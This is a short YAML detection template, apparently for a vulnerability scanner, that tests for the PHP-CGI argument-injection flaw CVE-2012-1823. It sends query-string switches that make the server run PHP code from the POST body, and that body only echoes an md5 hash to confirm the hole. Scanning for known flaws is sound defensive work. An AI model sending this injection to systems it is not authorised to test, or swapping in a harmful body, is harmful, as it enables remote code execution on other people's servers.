name: poc-yaml-php-cgi-cve-2012-1823
set:
  rand: randomInt(200000000, 210000000)
rules:
  - method: POST
    path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
    body: <?php echo md5({{rand}}); ?>
    follow_redirects: false
    expression: |
      response.body.bcontains(bytes(md5(string(rand))))
detail:
  author: 17bdw
  links:
    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823